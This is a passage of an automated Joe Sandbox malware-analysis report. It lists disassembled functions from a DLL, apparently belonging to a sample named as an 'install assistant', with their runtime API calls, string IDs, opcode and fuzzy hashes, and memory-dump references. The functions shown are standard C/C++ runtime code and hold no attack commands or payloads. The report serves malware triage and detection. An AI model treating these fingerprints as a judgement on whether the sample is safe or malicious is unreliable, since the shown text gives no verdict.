                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                            • API String ID: 3519838083-609671
                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction ID: 39a608cfb4acaab27fc287e3ca51147d2258a503ad68397d0935be2e2bf51bbf
                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction Fuzzy Hash: 2ED1B371A0820A9FCF01CFE4D984BEDB7B5FF59308F144069E455A3E50DB78AA48CBA0
                            Function 6BF82F60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BF82F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BF82FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF82FD0
                            • __Getctype.LIBCPMT ref: 6BF83084
                            • std::_Facet_Register.LIBCPMT ref: 6BF8309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF830B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID: py
                            • API String ID: 1102183713-1403765651
                            • Opcode ID: 4a8da8e5822590206595af82536037f905545417b4d3dce0124d8cfae7ae58b9
                            • Instruction ID: 8996c278f3ee6307246d9648613184628e23ef6d91cabd12dd3488f355cc4ed9
                            • Opcode Fuzzy Hash: 4a8da8e5822590206595af82536037f905545417b4d3dce0124d8cfae7ae58b9
                            • Instruction Fuzzy Hash: 5D4168B2E002158FCB10CF98D851B9EBBF0FF48714F058158E869AB760DB39A904CFA1
                            Function 6C106798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __aulldiv$H_prolog
                            • String ID: >WJ$x$x
                            • API String ID: 2300968129-3162267903
                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction ID: 3fa36cfcd66f83793568c4bf4c16be96aa7e32f543e2877014ad4d50707f73b3
                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction Fuzzy Hash: 3E126A71A0021DEFDF10DFA4C880ADDBBB5FF18318F24856AE925AB650DB35A985CF50
                            Function 6C0BA040 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6C0BA077
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0BA07F
                            • _ValidateLocalCookies.LIBCMT ref: 6C0BA108
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0BA133
                            • _ValidateLocalCookies.LIBCMT ref: 6C0BA188
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 76e3d2be325ae3a9ef37b821db7baddad17f06edea34c8d5d430bd1ddc517453
                            • Instruction ID: e6382a01ee3ce53644ceca863b1e9c7019c1890f5b418ea16f0faa66e7efc0cb
                            • Opcode Fuzzy Hash: 76e3d2be325ae3a9ef37b821db7baddad17f06edea34c8d5d430bd1ddc517453
                            • Instruction Fuzzy Hash: 7B41BF34E01218ABCF10CF68C890BAEBBF5BF45328F208555E918BB751D732EA15CB91
                            Function 6C0C740A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: 22cd1131ac30812ce6d178237e1cfdf6f3b7a4cb6208594aa729f725744de7d5
                            • Instruction ID: 2c99a3c7f23f7f2de731914883f8513dcbbbe0adadadbd8354a87f1f7ebbcdbc
                            • Opcode Fuzzy Hash: 22cd1131ac30812ce6d178237e1cfdf6f3b7a4cb6208594aa729f725744de7d5
                            • Instruction Fuzzy Hash: CC21A832F46A11BBDB118A6DDC40B5F3FE89F06778F150650ED29A7681DB38EC0086E2
                            Function 6C0CC421 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetConsoleCP.KERNEL32(?,6C0CB640,?), ref: 6C0CC469
                            • __fassign.LIBCMT ref: 6C0CC648
                            • __fassign.LIBCMT ref: 6C0CC665
                            • WriteFile.KERNEL32(?,6C0D6026,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0CC6AD
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C0CC6ED
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0CC799
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 499478d565538197db84987c1f09b12204c4095521a0214ae46c5a689b829554
                            • Instruction ID: 1feffaaa7df327061e7e106d5a8e6972801fb530aba01c42bffe04b8b2b80079
                            • Opcode Fuzzy Hash: 499478d565538197db84987c1f09b12204c4095521a0214ae46c5a689b829554
                            • Instruction Fuzzy Hash: 53D1A775E012489FCF11DFA8C880AEDBBF5EF49314F28426AE855BB241D731AA46CF51
                            Function 6C0F4FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: 3429d59b719819da98ae7f38b6fd74f5eac2bfb3ee288ec78aef8055d693ae35
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: C7219335605219FBDF208E949C40FDF7AAAFF457A8F20C626B934616D0D2718D91CAE1
                            Function 6C0FA6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C0FA6F1
                              • Part of subcall function 6C109173: __EH_prolog.LIBCMT ref: 6C109178
                            • __EH_prolog.LIBCMT ref: 6C0FA8F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: 79fcfad50c0090ba16ebfdb9187e48057bd043ae26301419f9647726e2f41c69
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: 53717D30904259DFDB14DFA4C494BDDBBF0BF19308F2084A9D8656BB91CB74BA4ACB91
                            Function 6C0D5F7D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6C0D604D
                            • _free.LIBCMT ref: 6C0D6076
                            • SetEndOfFile.KERNEL32(00000000,6C0D4C5C,00000000,6C0CB640,?,?,?,?,?,?,?,6C0D4C5C,6C0CB640,00000000), ref: 6C0D60A8
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0D4C5C,6C0CB640,00000000,?,?,?,?,00000000,?), ref: 6C0D60C4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: 270c7d59e0b6f39c07208ee4fe15322468a40232f375dea3a04d527f446335d1
                            • Instruction ID: d64c8174540f7fc1ee035ef8048a4463b190242501fe81f39eacad88d517d5ed
                            • Opcode Fuzzy Hash: 270c7d59e0b6f39c07208ee4fe15322468a40232f375dea3a04d527f446335d1
                            • Instruction Fuzzy Hash: BA41A4B6601705AADB119BB5CC00BCF3BF9EF46324F260910E914E7B90EB75F8594721
                            Function 6C10E418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C10E41D
                              • Part of subcall function 6C10EE40: __EH_prolog.LIBCMT ref: 6C10EE45
                              • Part of subcall function 6C10E8EB: __EH_prolog.LIBCMT ref: 6C10E8F0
                              • Part of subcall function 6C10E593: __EH_prolog.LIBCMT ref: 6C10E598
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: 188bca7865e785992a3954b0742c8064af3387fbb22be301963891cfdb6cb4e1
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: B2216871E01248AECB09DBE5D994AEDBBF4AF19318F20406EE41277780DF781E08CB51
                            Function 6C0BF69A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0BF724,?,?,6C0BF7A5,?,?,?), ref: 6C0BF6AF
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0BF6C2
                            • FreeLibrary.KERNEL32(00000000,?,?,6C0BF724,?,?,6C0BF7A5,?,?,?), ref: 6C0BF6E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 9999a11638c653b20a2e4b8dc30209559a8836cc3a6b45b34994797a06dd14c7
                            • Instruction ID: db81c75245568156daba04a185d6b3213ad10eac99a31ab0973b3e1ea4224649
                            • Opcode Fuzzy Hash: 9999a11638c653b20a2e4b8dc30209559a8836cc3a6b45b34994797a06dd14c7
                            • Instruction Fuzzy Hash: 69F01C3AA4111AFBDF41ABD1C909B9E7BFCEB49759F104060E905B3560CF718A00EA94
                            Function 6C0B7897 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6C0B789E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C0B78A9
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0B7917
                              • Part of subcall function 6C0B77A0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0B77B8
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6C0B78C4
                            • _Yarn.LIBCPMT ref: 6C0B78DA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: d031d156f9cf5ac10d321f9c0863fb7564c384e21c41198027bd9994f287f9e6
                            • Instruction ID: 045e53e8166f7910cdb0bfd5e42b6b06a0bb11418bcc768913e32a40af88f6d2
                            • Opcode Fuzzy Hash: d031d156f9cf5ac10d321f9c0863fb7564c384e21c41198027bd9994f287f9e6
                            • Instruction Fuzzy Hash: 40018FB56002159BDB06DF24C450BBC7BF1FF9A244B154049D81667780DF35BA06DFA9
                            Function 6C136E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 17a516df9a4397cb5866e80fb125d2a54466ec350b57ca1530798b8b632e2aeb
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: 15127C70E16259DFCB04CFA4C590ADDBBB1BF09308F14946AE849ABB51DB34E945CFA0
                            Function 6C102B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: 9d7cc704bc56dfa6c368902460702cfe498fc9ca4b66c5c36e50273808a56d57
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 86B14CB1E00209DFCB14CF99C994AAEBBB5FF58314B60852EE415A7B50DB34AA45CF90
                            Function 6BF82020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 6C0B7897: __EH_prolog3.LIBCMT ref: 6C0B789E
                              • Part of subcall function 6C0B7897: std::_Lockit::_Lockit.LIBCPMT ref: 6C0B78A9
                              • Part of subcall function 6C0B7897: std::locale::_Setgloballocale.LIBCPMT ref: 6C0B78C4
                              • Part of subcall function 6C0B7897: _Yarn.LIBCPMT ref: 6C0B78DA
                              • Part of subcall function 6C0B7897: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0B7917
                              • Part of subcall function 6BF82F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF82F95
                              • Part of subcall function 6BF82F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF82FAF
                              • Part of subcall function 6BF82F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF82FD0
                              • Part of subcall function 6BF82F60: __Getctype.LIBCPMT ref: 6BF83084
                              • Part of subcall function 6BF82F60: std::_Facet_Register.LIBCPMT ref: 6BF8309C
                              • Part of subcall function 6BF82F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF830B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6BF8211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: 5b1f4260668b307a97b6781ef1ac64a962c66ed9e0499984e3f53596712271c5
                            • Instruction ID: 42623fb53a2b893e5eb98eb5e400edb2b94678a387dea7e1c1290271d4801167
                            • Opcode Fuzzy Hash: 5b1f4260668b307a97b6781ef1ac64a962c66ed9e0499984e3f53596712271c5
                            • Instruction Fuzzy Hash: 1F4182B5E007098FDB00CF64D8457AABBF5FF48314F148268E919AB391E776A985CF90
                            Function 6C114EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C114ECC
                              • Part of subcall function 6C0FF58A: __EH_prolog.LIBCMT ref: 6C0FF58F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: 67961f57f13f64a9abfe756378f46fac7e7c23f22cfb84ed7b52046305228ce9
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: 1621C9B0801B40CFC760CF6AC14428ABBF4BF29708B10895EC1AA97B11D7B8B508CF55
                            Function 6C0CB300 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C0CB640,6BF81DEA,00008000,6C0CB640,?,?,?,6C0CB1EF,6C0CB640,?,00000000,6BF81DEA), ref: 6C0CB339
                            • GetLastError.KERNEL32(?,?,?,6C0CB1EF,6C0CB640,?,00000000,6BF81DEA,?,6C0D4C0E,6C0CB640,000000FF,000000FF,00000002,00008000,6C0CB640), ref: 6C0CB343
                            • __dosmaperr.LIBCMT ref: 6C0CB34A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: 317075d6a94033a5d0f66432f7ae721bb45537282cf27c86b7ec47381322865a
                            • Instruction ID: 93908e84605635e2d5acbe3ed1e72d5e3e9f5f98f61f1816e934fcca880fd5e8
                            • Opcode Fuzzy Hash: 317075d6a94033a5d0f66432f7ae721bb45537282cf27c86b7ec47381322865a
                            • Instruction Fuzzy Hash: E101D837718615BBCF058FA9DC0499D3BBDDF86734B650208F82197690EE71E9418B61
                            Function 6C0C4F22 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,?,6C0BF4D4,6C0E6DF0,0000000C), ref: 6C0C4F27
                            • _free.LIBCMT ref: 6C0C4F84
                            • _free.LIBCMT ref: 6C0C4FBA
                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C0BF4D4,6C0E6DF0,0000000C), ref: 6C0C4FC5
                            Memory Dump Source
